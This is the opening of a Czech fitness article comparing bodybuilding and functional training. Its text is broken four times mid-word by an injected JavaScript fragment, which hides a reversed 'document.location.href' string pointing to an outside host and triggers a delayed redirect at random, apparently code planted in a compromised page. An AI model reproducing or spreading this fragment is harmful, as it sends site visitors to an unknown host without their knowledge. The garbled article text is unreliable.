• Tréninky

    KULTURISTICKÝ vs. FUNKČNÍ TRÉNINK

    Budujte sílu netradiční kombinací tréninkových stylů. Nekonvenční tréninkové přístupy patří k oblíbeným metobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}todám zejména v MMA, ale i řada dalších sportobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovců v poslední době vyhledává méně obvyklé cvičební postupy, které jim mají posloužit ke zpestření tréninku a současně tělo vyburcovat k nárůstu výkonnosti. Nemusíte přitobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tom objevovat Ameriku, častobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to postačí netradiční kombinace a využití tréninkových pomůcek, s nimiž jste doposud neměli tu čest pracovat. Většina lidí ve fitku využívá k budování síly klasický trénink s činkami. Vychází z osvědčené praktiky, že díky přetížení svalů pomocí velkých zátěží dosáhnou kvalitních výsledků. A mají samozřejmě pravdu. Nicméně…